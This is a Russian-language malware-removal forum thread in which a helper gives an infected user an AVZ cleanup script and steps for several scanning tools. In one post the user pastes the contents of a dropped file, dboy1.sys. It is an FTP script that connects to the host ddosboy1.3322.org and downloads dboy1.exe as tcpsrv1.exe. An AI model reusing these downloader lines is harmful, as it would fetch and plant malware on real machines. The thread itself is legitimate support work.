[Awejk]

Я прошу прощения что не ознакомился с инструкцией... завтра всё зделаю

[Awejk]

Наконец-то добрался до логов, зделал как по инструкции.

hijackthis.zip
virusinfo_syscheck.zip
virusinfo_syscure.zip

Если где-то ошибся, то поправте, переделаю.

Есть у кого какие предположения, что это такое?

p.s. UnlockerHook.dll до установки этой программы сообщение о трояне появлялось а программу (Unlocker) поставил что-бы при удалении файлов занятых каким то процессом не надо было перегружать комп, очень выручает, не думаю что дело в ней.

[Awejk]

у меня постоянно в system32 появляются файлы dboy.bat и dboy.sys причём они текстовые
сколько не пробЫвал удалять бесполезно, ну и окошко в первом посте... чтоб его....

кто нибудь выручайте...

[Pili]

Modnyi_Keks, здравствуйте. Антивирус и файервол надо было отключать, по логам они у вас работают (и драйвера и службы)
AskSBar (D:\Program Files\AskSBar) деинсталируйте.
Запустите AVZ, далее в меню файл - выполнить скрипт, выделите и скопируйте текст ниже в окно выполнения скрипта AVZ, временно выключите антивирус, firewall и другое защитное программное обеспечение, в т.ч. SpybotSD TeaTimer, отключите интернет (или включите временно брандмауэр windows), нажмите кнопку «Запустить».

Код:

begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
 SetServiceStart('WinHost32Svr', 4);
 SetServiceStart('WinSpoolSvc', 4);
 SetServiceStart('obvious', 4);
 SetServiceStart('sysdrv32', 4);
 QuarantineFile('D:\Program Files\AskSBar\SrchAstt\1.bin\A2SRCHAS.DLL','');
 QuarantineFile('D:\Program Files\Real Desktop\Real Desktop.exe','');
 QuarantineFile('D:\WINDOWS\system32\cssdll32.dll','');
 QuarantineFile('D:\WINDOWS\system32\drivers\sysdrv32.sys','');
 QuarantineFile('D:\WINDOWS\system32\DRIVERS\obvious.sys','');
 QuarantineFile('WinSpoolSvc.sys','');
 QuarantineFile('D:\WINDOWS\security\svchost.exe','');
 QuarantineFile('d:\program files\tray2.final\tray.exe','');
 DeleteFile('D:\WINDOWS\security\svchost.exe');
 DeleteFile('WinSpoolSvc.sys');
 DeleteFile('D:\WINDOWS\system32\DRIVERS\obvious.sys');
 DeleteFile('D:\WINDOWS\system32\drivers\sysdrv32.sys');
 DeleteFile('D:\Program Files\AskSBar\SrchAstt\1.bin\A2SRCHAS.DLL');
 DeleteService('WinHost32Svr');
 DeleteService('obvious');
 DeleteService('WinSpoolSvc');
 DeleteService('sysdrv32');
 DelBHO('{0579B4B1-0293-4d73-B02D-5EBB0BA0F0A2}');
BC_ImportDeletedList;
ExecuteSysClean;
 BC_DeleteFile('D:\WINDOWS\system32\drivers\sysdrv32.sys');
 BC_DeleteFile('D:\WINDOWS\system32\DRIVERS\obvious.sys');
 BC_DeleteFile('D:\WINDOWS\security\svchost.exe');
 BC_DeleteSvc('WinHost32Svr');
 BC_DeleteSvc('obvious');
 BC_DeleteSvc('WinSpoolSvc');
 BC_DeleteSvc('sysdrv32');
BC_Activate;
RebootWindows(true);
end.

Компьютер перезагрузится. После перезагрузки выполнить ещё скрипт

Код:

begin	
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.

Файл quarantine.zip отправьте на user15802[at]mail.ru, в письме укажите ссылку на тему
Удалите папку D:\Program Files\AskSBar\
Обновите Java Runtime Environment (JRE)
Скачайте JavaRA здесь или здесь
Распакуйте, запустите, выберите "Remove Older Versions",
Далее нажмите "Search For Updates", выберите "Update Using Sun Java's Website" и "Open Webpage"
Альтернативный вариант - после удаления старой версии скачайте и установите последнюю версию Java Runtime Environment (JRE) с сайта производителя.
С помощью cureit и/или AVPTool проверку проводили?
Отключите антивирус и файервол и повторите логи virusinfo_syscheck.zip (2-ой стандартный скрипт AVZ) и hijackthis

[Awejk]

Я отключал антивирусник и файрвол из автозагрузки, не думал что надо было и службы отключить. Кстати, лучше уточните, это в инструкции, что службы тоже нужно отключить. Т.к. я сразу, честно говоря, не додумался.

Обновлять Java Runtime Environment обязательно? После форматирования винчестера я поставил новый билд но всё равно потом админ удалил и поставил "наш" апдейт. Не знаю почему, не спрашивал. Можно ли этот пункт пропустить?

[Pili]

Modnyi_Keks, здесь есть инструкции как выключить защитное ПО на англ., зато с картинками, из автозагрузки убирать не требуется, службы отключать тоже, достаточно чтобы антивирусный монитор и другие защитные компоненты (напр. для некоторых защита реестра и пр.) не работали, для Avira достаточно статуса "Antivir Guard disable" в трее (зонтик в трее свернут), Teatimer выключать необходимо, запустив Spybot S&D и переключившись в Advanced Mode,
Обновления JRE можете пропустить, но старые версии имеют уязвимости. Админ ставит "ваш" апдейт видимо из-за того, что требуется какой-то программе, которая с обновленной версией JRE работает некорректно (в таком случае лучше обновлять программу, иначе это угроза безопасности как клиентов, так и самой информационной системе).

[Awejk]

Новые:
hijackthis.zip
virusinfo_syscheck.zip
virusinfo_syscure.zip

Выключал именно так как было указано в инструкции.

проверял cureit-ом говорит всё чисто, однако файлы cmd.com, dboy.sys dboy.bat, и уже dboy1.sys как положено лежат в директории system32. Кстати вот к примеру файл dboy1.sys - его содержимое:

PHP код:

open ddosboy1.3322.org 

dboy

dboy

if

if

get dboy1.exe C:Windowstcpsrv1.exe

get dboy1.exe C:Windowstcpsrv1.exe

bye

bye 

наверно меня и спасло что винду я поставил не на С как обычно, а на D. Да и файла нет такого tcpsrv1.exe. Хоть что-то.

Удалил эти файлы... надолго ли...

[Pili]

Modnyi_Keks, virusinfo_syscure.zip - лог старый выложили.
Файлы из карантина ушли в вирлаб, D:\Program Files\Real Desktop\Real Desktop.exe в карантин не попал, можете поискать вручную и проверить на virustotal.com, если Real Desktop.exe окажется чистым, то по новым логам hijackthis и virusinfo_syscheck чисто, файлов cmd.com, dboy.sys dboy.bat,dboy1.sys и Windowstcpsrv1.exe в логах не видно.
Запустите HiJackThis, нажмите кнопку "Do a system scan only", в открывшемся окне поставьте галочки напротив указанных строк и нажмите кнопку "Fix Checked".

Цитата:

R3 - URLSearchHook: (no name) - {0579B4B6-0293-4d73-B02D-5EBB0BA0F0A2} - (no file)

Скачайте SDFix, загрузитесь в безопасном режиме, запустите утилиту (запустить RunThis.bat - подтвердить, нажав "Y"), после окончания сканирования скопируйте (Ctrl+A, Ctrl+C) текст из C:\Report.txt и вставьте (Ctrl+V) в следующее сообщение, если текст не уместится в одном сообщении, продолжите его в следующем или запакуйте файл C:\Report.txt и прикрепите к сообщению
Описание SDFix есть здесь или здесь

Скачайте Malwarebytes' Anti-Malware здесь, здесь, здесь или здесь. Установите, обновите базы, выберите Perform Full Scan (Провести полную проверку), нажмите Scan (Проверить), после сканирования выберите Ок и далее Show Results (Показать результаты), нажмите "Remove Selected" (Удалить выделенные). После удаления откройте лог и скопируйте в сообщение. Логи сканирования можно посмотреть во вкладке Logs (Отчеты), выбрав отчет и нажав кнопку Open (Открыть).

Скачайте ComboFix здесь, здесь или здесь и сохраните на рабочий стол.
Установите Recovery Console по инструкции (на англ.яз) - how-to-use-combofix и здесь - скачайте установочный файл для своей ОС (например Windows XP с пакетом обновления 2 (SP2) - для Windows XP SP3 использовать этот же файл) на рабочий стол, закройте все остальные приложения и мышкой перенесите установочный файл на иконку ComboFix и установите Microsoft Recovery Console. Доп. см. Программа для Windows XP Professional с пакетом обновления 2 (SP2): Установочные диски для установки с гибкого диска.
После установки консоли восстановления программа предложит запустить сканирование, подтвердите, нажав Yes.
Когда процесс сканирования завершится, скопируйте (Ctrl+A, Ctrl+C) текст из C:\ComboFix.txt и вставьте (Ctrl+V) в следующее сообщение если текст не уместится в одном сообщении, продолжите его в следующем или запакуйте файл C:\ComboFix.txt и прикрепите к сообщению.
Внимание! Перед запуском сканирования обязательно закройте все браузеры, временно выключите антивирус, firewall и другое защитное программное обеспечение. Не запускайте других программ во время работы Combofix и не нажимайте кнопки мыши. Combofix может отключить интернет через некоторое время после запуска, не переподключайте интернет пока Combofix не завершит работу. Если интернет не появился после окончания работы Combofix, перезагрузите компьютер.
Как использовать ComboFix - how-to-use-combofix (на англ.яз.) и здесь (на русском)

[Awejk]

Цитата Pili:

D:\Program Files\Real Desktop\Real Desktop.exe »

У меня такой папки нет, и я вообще не могу поиском найти нечто подобное на real desktop.exe
Может в каком нибудь system32, однако там тоже пошарил поиском ничего не нашлось, пробЫвал разные варианты, это что за файл? Какое точное имя файла?